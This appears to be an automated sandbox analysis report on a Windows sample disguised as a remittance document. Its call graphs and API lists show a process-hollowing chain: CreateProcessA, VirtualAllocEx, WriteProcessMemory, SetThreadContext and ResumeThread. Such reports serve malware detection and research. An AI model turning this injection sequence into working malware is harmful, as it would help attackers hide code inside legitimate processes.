30006->30018 30019 6be8ecf 2 API calls 30006->30019 30020 6be8fca 4 API calls 30006->30020 30021 6be8aea 2 API calls 30006->30021 30022 6be8a6a 2 API calls 30006->30022 30023 6be8a88 6 API calls 30006->30023 30024 6be88a9 4 API calls 30006->30024 30025 6be8ba9 ReadProcessMemory 30006->30025 30026 6be89a9 2 API calls 30006->30026 30027 6be8984 2 API calls 30006->30027 30007 6be84da 30007->29953 30008->30007 30009->30007 30010->30007 30011->30007 30012->30007 30013->30007 30014->30007 30015->30007 30016->30007 30017->30007 30018->30007 30019->30007 30020->30007 30021->30007 30022->30007 30023->30007 30024->30007 30025->30007 30026->30007 30027->30007 30029 6be8990 30028->30029 30029->30028 30146 6be4eb0 30029->30146 30150 6be4eae 30029->30150 30030 6be900f 30030->29960 30030->30030 30034 6be8990 30033->30034 30036 6be4eae WriteProcessMemory 30034->30036 30037 6be4eb0 WriteProcessMemory 30034->30037 30035 6be900f 30035->29960 30035->30035 30036->30035 30037->30035 30154 6be48d8 30038->30154 30158 6be48e0 30038->30158 30039 6be89c3 30039->29960 30043 6be8bb1 30042->30043 30162 6be4fa0 30043->30162 30047 6be88bb 30046->30047 30166 6be512d 30047->30166 30170 6be5138 30047->30170 30048 6be8968 30049 6be900f 30048->30049 30052 6be4eae WriteProcessMemory 30048->30052 30053 6be4eb0 WriteProcessMemory 30048->30053 30049->29960 30052->30049 30053->30049 30055 6be8a95 30054->30055 30057 6be8a13 30054->30057 30064 6be48d8 Wow64SetThreadContext 30055->30064 30065 6be48e0 Wow64SetThreadContext 30055->30065 30056 6be8b06 30056->29960 30057->30056 30058 6be8990 30057->30058 30174 6be43f1 30057->30174 30178 6be43f8 30057->30178 30060 6be4eae WriteProcessMemory 30058->30060 30061 6be4eb0 WriteProcessMemory 30058->30061 30059 6be900f 30059->29960 30059->30059 30060->30059 30061->30059 30064->30057 30065->30057 30067 6be89a8 30066->30067 30068 6be8f62 30067->30068 30070 6be48d8 Wow64SetThreadContext 30067->30070 30071 6be48e0 Wow64SetThreadContext 30067->30071 30068->29960 30069 6be89c3 30069->29960 30070->30069 30071->30069 30073 6be8990 30072->30073 30075 6be4eae WriteProcessMemory 30073->30075 30076 6be4eb0 WriteProcessMemory 30073->30076 30074 6be900f 30074->29960 30074->30074 30075->30074 30076->30074 30078 6be8fd7 30077->30078 30079 6be8b06 30078->30079 30080 6be8990 30078->30080 30084 6be43f8 ResumeThread 30078->30084 30085 6be43f1 ResumeThread 30078->30085 30079->29960 30082 6be4eae WriteProcessMemory 30080->30082 30083 6be4eb0 WriteProcessMemory 30080->30083 30081 6be900f 30081->29960 30081->30081 30082->30081 30083->30081 30084->30078 30085->30078 30087 6be8ed5 30086->30087 30089 6be4eae WriteProcessMemory 30087->30089 30090 6be4eb0 WriteProcessMemory 30087->30090 30088 6be9202 30089->30088 30090->30088 30092 6be9095 30091->30092 30182 6be4de8 30092->30182 30186 6be4df0 30092->30186 30093 6be9356 30093->30093 30097 6be9037 30096->30097 30099 6be4de8 VirtualAllocEx 30097->30099 30100 6be4df0 VirtualAllocEx 30097->30100 30098 6be9356 30099->30098 30100->30098 30102 6be8937 30101->30102 30103 6be8968 30102->30103 30105 6be512d CreateProcessA 30102->30105 30106 6be5138 CreateProcessA 30102->30106 30104 6be900f 30103->30104 30107 6be4eae WriteProcessMemory 30103->30107 30108 6be4eb0 WriteProcessMemory 30103->30108 30104->29960 30104->30104 30105->30103 30106->30103 30107->30104 30108->30104 30110 6be8b6b 30109->30110 30112 6be4de8 VirtualAllocEx 30110->30112 30113 6be4df0 VirtualAllocEx 30110->30113 30111 6be9356 30112->30111 30113->30111 30115 6be8990 30114->30115 30117 6be4eae WriteProcessMemory 30115->30117 30118 6be4eb0 WriteProcessMemory 30115->30118 30116 6be900f 30116->29960 30116->30116 30117->30116 30118->30116 30120 6be8a31 30119->30120 30122 6be4fa0 ReadProcessMemory 30120->30122 30121 6be8dbd 30121->29960 30122->30121 30124 6be8a20 30123->30124 30126 6be4fa0 ReadProcessMemory 30124->30126 30125 6be8dbd 30125->29960 30126->30125 30129 6be8d23 30127->30129 30128 6be8cdf 30128->29960 30129->30128 30131 6be4eae WriteProcessMemory 30129->30131 30132 6be4eb0 WriteProcessMemory 30129->30132 30130 6be900f 30130->29960 30130->30130 30131->30130 30132->30130 30135 6be4eae WriteProcessMemory 30133->30135 30136 6be4eb0 WriteProcessMemory 30133->30136 30134 6be8aca 30134->29960 30135->30134 30136->30134 30139 6be8a02 30137->30139 30138 6be8b06 30138->29960 30139->30138 30140 6be8990 30139->30140 30144 6be43f8 ResumeThread 30139->30144 30145 6be43f1 ResumeThread 30139->30145 30142 6be4eae WriteProcessMemory 30140->30142 30143 6be4eb0 WriteProcessMemory 30140->30143 30141 6be900f 30141->29960 30141->30141 30142->30141 30143->30141 30144->30139 30145->30139 30147 6be4ef8 WriteProcessMemory 30146->30147 30149 6be4f4f 30147->30149 30149->30030 30151 6be4eb0 WriteProcessMemory 30150->30151 30153 6be4f4f 30151->30153 30153->30030 30155 6be48e0 Wow64SetThreadContext 30154->30155 30157 6be496d 30155->30157 30157->30039 30159 6be4925 Wow64SetThreadContext 30158->30159 30161 6be496d 30159->30161 30161->30039 30163 6be4feb ReadProcessMemory 30162->30163 30165 6be502f 30163->30165 30165->29960 30167 6be51c1 CreateProcessA 30166->30167 30169 6be5383 30167->30169 30171 6be51c1 CreateProcessA 30170->30171 30173 6be5383 30171->30173 30175 6be43f8 ResumeThread 30174->30175 30177 6be4469 30175->30177 30177->30057 30179 6be4438 ResumeThread 30178->30179 30181 6be4469 30179->30181 30181->30057 30183 6be4df0 VirtualAllocEx 30182->30183 30185 6be4e6d 30183->30185 30185->30093 30187 6be4e30 VirtualAllocEx 30186->30187 30189 6be4e6d 30187->30189 30189->30093 30194 6be9948 30195 6be98d6 30194->30195 30197 6be9953 30195->30197 30198 6be98e9 PostMessageW 30195->30198 30199 6be9924 30198->30199 30199->30194 29850 e34668 29851 e3467a 29850->29851 29852 e34686 29851->29852 29856 e34779 29851->29856 29861 e33e28 29852->29861 29854 e346a5 29857 e3479d 29856->29857 29865 e34888 29857->29865 29869 e34878 29857->29869 29862 e33e33 29861->29862 29877 e35c44 29862->29877 29864 e37048 29864->29854 29866 e348af 29865->29866 29867 e3498c 29866->29867 29873 e344b0 29866->29873 29871 e348af 29869->29871 29870 e3498c 29870->29870 29871->29870 29872 e344b0 CreateActCtxA 29871->29872 29872->29870 29874 e35918 CreateActCtxA 29873->29874 29876 e359db 29874->29876 29878 e35c4f 29877->29878 29881 e35c64 29878->29881 29880 e370ed 29880->29864 29882 e35c6f 29881->29882 29885 e35c94 29882->29885 29884 e371c2 29884->29880 29886 e35c9f 29885->29886 29889 e35cc4 29886->29889 29888 e372c5 29888->29884 29890 e35ccf 29889->29890 29892 e385cb 29890->29892 29895 e3ac7a 29890->29895 29891 e38609 29891->29888 29892->29891 29899 e3cd7c 29892->29899 29903 e3aca0 29895->29903 29907 e3acb0 29895->29907 29896 e3ac8e 29896->29892 29900 e3cd99 29899->29900 29901 e3cdbd 29900->29901 29930 e3cf28 29900->29930 29901->29891 29904 e3acb0 29903->29904 29910 e3ada8 29904->29910 29905 e3acbf 29905->29896 29909 e3ada8 2 API calls 29907->29909 29908 e3acbf 29908->29896 29909->29908 29911 e3adb9 29910->29911 29912 e3addc 29910->29912 29911->29912 29918 e3b040 29911->29918 29922 e3b030 29911->29922 29912->29905 29913 e3afe0 GetModuleHandleW 29915 e3b00d 29913->29915 29914 e3add4 29914->29912 29914->29913 29915->29905 29919 e3b054 29918->29919 29921 e3b079 29919->29921 29926 e3a130 29919->29926 29921->29914 29923 e3b054 29922->29923 29924 e3a130 LoadLibraryExW 29923->29924 29925 e3b079 29923->29925 29924->29925 29925->29914 29927 e3b220 LoadLibraryExW 29926->29927 29929 e3b299 29927->29929 29929->29921 29932 e3cf35 29930->29932 29933 e3cf6f 29932->29933 29934 e3bae0 29932->29934 29933->29901 29935 e3bae5 29934->29935 29937 e3dc88 29935->29937 29938 e3d2dc 29935->29938 29937->29937 29939 e3d2e7 29938->29939 29940 e35cc4 2 API calls 29939->29940 29941 e3dcf7 29940->29941 29941->29937

                                            Executed Functions

                                            Function 052B8B50 Relevance: 7.7, Strings: 6, Instructions: 202COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 295 52b8b50-52b8b80 296 52b8ba2-52b8ba7 295->296 297 52b8b82-52b8b85 295->297 296->297 298 52b8b8e-52b8ba0 297->298 299 52b8b87 297->299 298->297 299->296 299->298 300 52b8ba9 299->300 301 52b8caf-52b8cb3 299->301 302 52b8d8f-52b8d94 299->302 303 52b8bee-52b8bf0 299->303 304 52b8c6d-52b8c72 299->304 305 52b8d23-52b8d25 299->305 306 52b8bc5-52b8bc8 299->306 307 52b8c1a-52b8c21 299->307 308 52b8d99-52b8dbf 299->308 309 52b8d19-52b8d1e 299->309 310 52b8d78-52b8d7c 299->310 311 52b8c38-52b8c42 299->311 312 52b8cdf-52b8ce9 299->312 313 52b8cfe-52b8d05 299->313 314 52b8bbe-52b8bc3 299->314 315 52b8c77-52b8c8d 299->315 316 52b8df4-52b8dfd 299->316 324 52b8bac-52b8bae 300->324 319 52b8cb5-52b8cbe 301->319 320 52b8cd4 301->320 302->297 330 52b8c0e 303->330 331 52b8bf2-52b8bf8 303->331 304->297 327 52b8d43 305->327 328 52b8d27-52b8d2d 305->328 322 52b8e0c 306->322 329 52b8bce-52b8bd8 306->329 318 52b8e11-52b8e1b 307->318 334 52b8c27-52b8c33 307->334 364 52b8dc1 308->364 365 52b8dc4-52b8dce 308->365 309->297 332 52b8d88-52b8d8d 310->332 333 52b8d7e 310->333 317 52b8c48-52b8c59 311->317 311->318 312->318 325 52b8cef-52b8cf9 312->325 313->318 326 52b8d0b-52b8d14 313->326 314->297 315->324 351 52b8c93-52b8c9d 315->351 321 52b8dff-52b8e07 316->321 316->322 317->318 336 52b8c5f-52b8c68 317->336 338 52b8cc0-52b8cc3 319->338 339 52b8cc5-52b8cc8 319->339 340 52b8cd7-52b8cde 320->340 321->297 322->318 341 52b8bb0 324->341 342 52b8bb7-52b8bbc 324->342 325->297 326->297 346 52b8d45-52b8d64 327->346 343 52b8d2f-52b8d31 328->343 344 52b8d33-52b8d3f 328->344 329->318 345 52b8bde-52b8be7 329->345 347 52b8c10-52b8c11 330->347 348 52b8bfa-52b8bfc 331->348 349 52b8bfe-52b8c0a 331->349 332->302 350 52b8d83 332->350 333->350 334->297 336->297 352 52b8cd2 338->352 339->352 353 52b8bb5 341->353 342->314 342->353 355 52b8d41 343->355 344->355 356 52b8be9 345->356 357 52b8bec 345->357 346->318 366 52b8d6a-52b8d73 346->366 347->307 358 52b8c0c 348->358 349->358 350->297 351->318 360 52b8ca3-52b8caa 351->360 352->340 353->297 355->346 356->357 357->297 358->347 360->297 364->365 367 52b8dd0-52b8dd2 365->367 368 52b8dd4 365->368 366->297 369 52b8dd7-52b8de9 367->369 368->369 369->318 371 52b8deb-52b8def 369->371 371->297
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2091521925.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_52b0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR]q$LR]q$LR]q$LR]q$$]q$$]q
                                            • API String ID: 0-2875722158
                                            • Opcode ID: 02057cca6eaecd746c43f2f00dd03a3235fae7b59015c616b6bfafd49fa5e3f2
                                            • Instruction ID: ca9c1153e053ae5a2e63816d5cdf6968b18845a29f7c72c67d6926d567ab1e03
                                            • Opcode Fuzzy Hash: 02057cca6eaecd746c43f2f00dd03a3235fae7b59015c616b6bfafd49fa5e3f2
                                            • Instruction Fuzzy Hash: 0F71BD71A2410ACBEB18DF68C440BFDBBBABF44390F088066E45EEB291D6F49D418B51
                                            Function 00E3D031 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 372 e3d031-e3d0cf GetCurrentProcess 376 e3d0d1-e3d0d7 372->376 377 e3d0d8-e3d10c GetCurrentThread 372->377 376->377 378 e3d115-e3d149 GetCurrentProcess 377->378 379 e3d10e-e3d114 377->379 380 e3d152-e3d16d call e3d618 378->380 381 e3d14b-e3d151 378->381 379->378 385 e3d173-e3d1a2 GetCurrentThreadId 380->385 381->380 386 e3d1a4-e3d1aa 385->386 387 e3d1ab-e3d20d 385->387 386->387
                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 00E3D0BE
                                            • GetCurrentThread.KERNEL32 ref: 00E3D0FB
                                            • GetCurrentProcess.KERNEL32 ref: 00E3D138
                                            • GetCurrentThreadId.KERNEL32 ref: 00E3D191
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2081782528.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_e30000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: 4d4b302effe22ec969833f73f86e95f69b2c46e32c3b2d633d99d36efcce8753
                                            • Instruction ID: d2dbaa5cd50359e4a77a8689a24b799504a1fd7010fd02a741d2073f221e714e
                                            • Opcode Fuzzy Hash: 4d4b302effe22ec969833f73f86e95f69b2c46e32c3b2d633d99d36efcce8753
                                            • Instruction Fuzzy Hash: 475149B09016498FDB14DFA9D949BEEBFF1EF88304F208459E409A7360D7789984CF65
                                            Function 00E3D040 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 394 e3d040-e3d0cf GetCurrentProcess 398 e3d0d1-e3d0d7 394->398 399 e3d0d8-e3d10c GetCurrentThread 394->399 398->399 400 e3d115-e3d149 GetCurrentProcess 399->400 401 e3d10e-e3d114 399->401 402 e3d152-e3d16d call e3d618 400->402 403 e3d14b-e3d151 400->403 401->400 407 e3d173-e3d1a2 GetCurrentThreadId 402->407 403->402 408 e3d1a4-e3d1aa 407->408 409 e3d1ab-e3d20d 407->409 408->409
                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 00E3D0BE
                                            • GetCurrentThread.KERNEL32 ref: 00E3D0FB
                                            • GetCurrentProcess.KERNEL32 ref: 00E3D138
                                            • GetCurrentThreadId.KERNEL32 ref: 00E3D191
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2081782528.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_e30000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: 3c882239895f1fa9b283f8013861cced1a34aff2662e64402ba1a0757b133c08
                                            • Instruction ID: 9b4bf27c84b41bfde2610ebd86c891a4cb26c0a070ba52f2412a50474583379e
                                            • Opcode Fuzzy Hash: 3c882239895f1fa9b283f8013861cced1a34aff2662e64402ba1a0757b133c08
                                            • Instruction Fuzzy Hash: 3D5159B09012498FDB14EFA9D948BAEBFF5EF88304F208459E409A7350D778A984CF65
                                            Function 052B8B4A Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 416 52b8b4a-52b8b80 417 52b8ba2-52b8ba7 416->417 418 52b8b82-52b8b85 417->418 419 52b8b8e-52b8ba0 418->419 420 52b8b87 418->420 419->418 420->417 420->419 421 52b8ba9 420->421 422 52b8caf-52b8cb3 420->422 423 52b8d8f-52b8d94 420->423 424 52b8bee-52b8bf0 420->424 425 52b8c6d-52b8c72 420->425 426 52b8d23-52b8d25 420->426 427 52b8bc5-52b8bc8 420->427 428 52b8c1a-52b8c21 420->428 429 52b8d99-52b8dbf 420->429 430 52b8d19-52b8d1e 420->430 431 52b8d78-52b8d7c 420->431 432 52b8c38-52b8c42 420->432 433 52b8cdf-52b8ce9 420->433 434 52b8cfe-52b8d05 420->434 435 52b8bbe-52b8bc3 420->435 436 52b8c77-52b8c8d 420->436 437 52b8df4-52b8dfd 420->437 445 52b8bac-52b8bae 421->445 440 52b8cb5-52b8cbe 422->440 441 52b8cd4 422->441 423->418 451 52b8c0e 424->451 452 52b8bf2-52b8bf8 424->452 425->418 448 52b8d43 426->448 449 52b8d27-52b8d2d 426->449 443 52b8e0c 427->443 450 52b8bce-52b8bd8 427->450 439 52b8e11-52b8e1b 428->439 455 52b8c27-52b8c33 428->455 485 52b8dc1 429->485 486 52b8dc4-52b8dce 429->486 430->418 453 52b8d88-52b8d8d 431->453 454 52b8d7e 431->454 438 52b8c48-52b8c59 432->438 432->439 433->439 446 52b8cef-52b8cf9 433->446 434->439 447 52b8d0b-52b8d14 434->447 435->418 436->445 472 52b8c93-52b8c9d 436->472 442 52b8dff-52b8e07 437->442 437->443 438->439 457 52b8c5f-52b8c68 438->457 459 52b8cc0-52b8cc3 440->459 460 52b8cc5-52b8cc8 440->460 461 52b8cd7-52b8cde 441->461 442->418 443->439 462 52b8bb0 445->462 463 52b8bb7-52b8bbc 445->463 446->418 447->418 467 52b8d45-52b8d64 448->467 464 52b8d2f-52b8d31 449->464 465 52b8d33-52b8d3f 449->465 450->439 466 52b8bde-52b8be7 450->466 468 52b8c10-52b8c11 451->468 469 52b8bfa-52b8bfc 452->469 470 52b8bfe-52b8c0a 452->470 453->423 471 52b8d83 453->471 454->471 455->418 457->418 473 52b8cd2 459->473 460->473 474 52b8bb5 462->474 463->435 463->474 476 52b8d41 464->476 465->476 477 52b8be9 466->477 478 52b8bec 466->478 467->439 487 52b8d6a-52b8d73 467->487 468->428 479 52b8c0c 469->479 470->479 471->418 472->439 481 52b8ca3-52b8caa 472->481 473->461 474->418 476->467 477->478 478->418 479->468 481->418 485->486 488 52b8dd0-52b8dd2 486->488 489 52b8dd4 486->489 487->418 490 52b8dd7-52b8de9 488->490 489->490 490->439 492 52b8deb-52b8def 490->492 492->418
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2091521925.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_52b0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR]q$LR]q$$]q
                                            • API String ID: 0-2603884067
                                            • Opcode ID: a636ced5f991cbf4097a97e04f7a7f9f7652af0bf0eabbc737ed6d67acd19caa
                                            • Instruction ID: b8bcca481b977abf21db0b61233e2a312c696876bae316f0bfe74af75caf0ac1
                                            • Opcode Fuzzy Hash: a636ced5f991cbf4097a97e04f7a7f9f7652af0bf0eabbc737ed6d67acd19caa
                                            • Instruction Fuzzy Hash: 7C61BD71A28116CFEB14CF68C840BFDB7BABF44391F088166E45EEB291D3F499418B51
                                            Function 052BE4B8 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 582 52be4b8-52be4db 583 52be4dd 582->583 584 52be4e2-52be61c call 52be488 582->584 583->584 597 52be52a-52be52f 584->597 598 52be5de-52be5df 584->598 599 52be6c7-52be6d6 597->599 600 52be535-52be536 597->600 598->597 606 52be621-52be625 599->606 600->599 607 52be53b-52be6c2 606->607 608 52be62b-52be6aa 606->608 607->606 618 52be6b3-52be6bd 608->618
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2091521925.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_52b0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te]q$Te]q
                                            • API String ID: 0-3320153681
                                            • Opcode ID: fab900c7683fd0e37a1c233d9eefb88bb2b50e483eba9ff0d834863d684aeba6
                                            • Instruction ID: ba2e38bff2d38a08fc85b6316ff8cf028cf32adbb6256d472bc5be7dc64458c1
                                            • Opcode Fuzzy Hash: fab900c7683fd0e37a1c233d9eefb88bb2b50e483eba9ff0d834863d684aeba6
                                            • Instruction Fuzzy Hash: 6B71B474E14208CFDB08DFA9C984AEDBBFABF89300F109129D41AAB355DB706946CF50
                                            Function 052B7180 Relevance: 2.6, Strings: 2, Instructions: 73COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 619 52b7180-52b71a6 620 52b71ab-52b71ae 619->620 621 52b71b0 620->621 622 52b71b7-52b724c 620->622 621->622 623 52b720d 621->623 624 52b71dd-52b71e3 621->624 625 52b723c-52b7241 621->625 626 52b71d3-52b71db 621->626 627 52b7232-52b7237 621->627 628 52b7210-52b7215 621->628 629 52b7217-52b722a 621->629 630 52b71c4 621->630 622->624 623->628 635 52b71ed-52b7202 624->635 626->620 627->620 628->620 629->627 634 52b71cc-52b71d1 630->634 634->620 638 52b724e-52b7256 635->638 639 52b7204-52b720b 635->639 639->620
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2091521925.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_52b0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Haq$Haq
                                            • API String ID: 0-4016896955
                                            • Opcode ID: 276b15fb8e16db2dae725ee0762d89d1bdd6bb61a4bdaeb655ddd5d71179b86b
                                            • Instruction ID: 5a344ee534da6240f6d9e214b00998f23b860f855f7e9e2e8244da56a5b14bfa
                                            • Opcode Fuzzy Hash: 276b15fb8e16db2dae725ee0762d89d1bdd6bb61a4bdaeb655ddd5d71179b86b
                                            • Instruction Fuzzy Hash: EE21A4702283809FE7219729EC55FAB7EB9EFC2750F084566F1538A282C6F49E01C771
                                            Function 06BE512D Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 652 6be512d-6be51cd 654 6be51cf-6be51d9 652->654 655 6be5206-6be5226 652->655 654->655 656 6be51db-6be51dd 654->656 662 6be525f-6be528e 655->662 663 6be5228-6be5232 655->663 657 6be51df-6be51e9 656->657 658 6be5200-6be5203 656->658 660 6be51ed-6be51fc 657->660 661 6be51eb 657->661 658->655 660->660 664 6be51fe 660->664 661->660 671 6be52c7-6be5381 CreateProcessA 662->671 672 6be5290-6be529a 662->672 663->662 665 6be5234-6be5236 663->665 664->658 666 6be5238-6be5242 665->666 667 6be5259-6be525c 665->667 669 6be5246-6be5255 666->669 670 6be5244 666->670 667->662 669->669 673 6be5257 669->673 670->669 683 6be538a-6be5410 671->683 684 6be5383-6be5389 671->684 672->671 674 6be529c-6be529e 672->674 673->667 676 6be52a0-6be52aa 674->676 677 6be52c1-6be52c4 674->677 678 6be52ae-6be52bd 676->678 679 6be52ac 676->679 677->671 678->678 681 6be52bf 678->681 679->678 681->677 694 6be5412-6be5416 683->694 695 6be5420-6be5424 683->695 684->683 694->695 698 6be5418 694->698 696 6be5426-6be542a 695->696 697 6be5434-6be5438 695->697 696->697 699 6be542c 696->699 700 6be543a-6be543e 697->700 701 6be5448-6be544c 697->701 698->695 699->697 700->701 702 6be5440 700->702 703 6be545e-6be5465 701->703 704 6be544e-6be5454 701->704 702->701 705 6be547c 703->705 706 6be5467-6be5476 703->706 704->703 707 6be547d 705->707 706->705 707->707
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06BE536E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2092962327.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6be0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: 1ea41d271530a0c45eb6827f5150451a3a93837661fb2e13f76ca24cd3303010
                                            • Instruction ID: 5e02e256a5f8448402efefef42d16a8240a672a6738f9c2aac54b4f8d87f52b8
                                            • Opcode Fuzzy Hash: 1ea41d271530a0c45eb6827f5150451a3a93837661fb2e13f76ca24cd3303010
                                            • Instruction Fuzzy Hash: E5A18FB2D00219CFDB64CF68C841BDDBBB2FF44304F1485AAE809A7254DB759985CF92
                                            Function 06BE5138 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 709 6be5138-6be51cd 711 6be51cf-6be51d9 709->711 712 6be5206-6be5226 709->712 711->712 713 6be51db-6be51dd 711->713 719 6be525f-6be528e 712->719 720 6be5228-6be5232 712->720 714 6be51df-6be51e9 713->714 715 6be5200-6be5203 713->715 717 6be51ed-6be51fc 714->717 718 6be51eb 714->718 715->712 717->717 721 6be51fe 717->721 718->717 728 6be52c7-6be5381 CreateProcessA 719->728 729 6be5290-6be529a 719->729 720->719 722 6be5234-6be5236 720->722 721->715 723 6be5238-6be5242 722->723 724 6be5259-6be525c 722->724 726 6be5246-6be5255 723->726 727 6be5244 723->727 724->719 726->726 730 6be5257 726->730 727->726 740 6be538a-6be5410 728->740 741 6be5383-6be5389 728->741 729->728 731 6be529c-6be529e 729->731 730->724 733 6be52a0-6be52aa 731->733 734 6be52c1-6be52c4 731->734 735 6be52ae-6be52bd 733->735 736 6be52ac 733->736 734->728 735->735 738 6be52bf 735->738 736->735 738->734 751 6be5412-6be5416 740->751 752 6be5420-6be5424 740->752 741->740 751->752 755 6be5418 751->755 753 6be5426-6be542a 752->753 754 6be5434-6be5438 752->754 753->754 756 6be542c 753->756 757 6be543a-6be543e 754->757 758 6be5448-6be544c 754->758 755->752 756->754 757->758 759 6be5440 757->759 760 6be545e-6be5465 758->760 761 6be544e-6be5454 758->761 759->758 762 6be547c 760->762 763 6be5467-6be5476 760->763 761->760 764 6be547d 762->764 763->762 764->764
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06BE536E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2092962327.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6be0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: 8b5434930aa07e22f13500692dc753c8464a055ea33d1d92905ecb8a0f0e8675
                                            • Instruction ID: e2168900828a46cae2885c169e5eaa6a3ba2c625f93ce6b90ff7967e86bc992f
                                            • Opcode Fuzzy Hash: 8b5434930aa07e22f13500692dc753c8464a055ea33d1d92905ecb8a0f0e8675
                                            • Instruction Fuzzy Hash: 6C918FB1D00219CFDB64CF68C841BDDBBB2FF48314F1485AAE809A7244DB759985CF92
                                            Function 00E3ADA8 Relevance: 1.7, APIs: 1, Instructions: 199COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 766 e3ada8-e3adb7 767 e3ade3-e3ade7 766->767 768 e3adb9-e3adc6 call e3a0cc 766->768 770 e3adfb-e3ae3c 767->770 771 e3ade9-e3adf3 767->771 774 e3adc8 768->774 775 e3addc 768->775 777 e3ae49-e3ae57 770->777 778 e3ae3e-e3ae46 770->778 771->770 822 e3adce call e3b040 774->822 823 e3adce call e3b030 774->823 775->767 779 e3ae7b-e3ae7d 777->779 780 e3ae59-e3ae5e 777->780 778->777 785 e3ae80-e3ae87 779->785 782 e3ae60-e3ae67 call e3a0d8 780->782 783 e3ae69 780->783 781 e3add4-e3add6 781->775 784 e3af18-e3afd8 781->784 787 e3ae6b-e3ae79 782->787 783->787 817 e3afe0-e3b00b GetModuleHandleW 784->817 818 e3afda-e3afdd 784->818 788 e3ae94-e3ae9b 785->788 789 e3ae89-e3ae91 785->789 787->785 792 e3aea8-e3aeaa call e3a0e8 788->792 793 e3ae9d-e3aea5 788->793 789->788 795 e3aeaf-e3aeb1 792->795 793->792 797 e3aeb3-e3aebb 795->797 798 e3aebe-e3aec3 795->798 797->798 799 e3aee1-e3aeee 798->799 800 e3aec5-e3aecc 798->800 807 e3af11-e3af17 799->807 808 e3aef0-e3af0e 799->808 800->799 802 e3aece-e3aede call e3a0f8 call e3a108 800->802 802->799 808->807 819 e3b014-e3b028 817->819 820 e3b00d-e3b013 817->820 818->817 820->819 822->781 823->781
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00E3AFFE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2081782528.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_e30000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
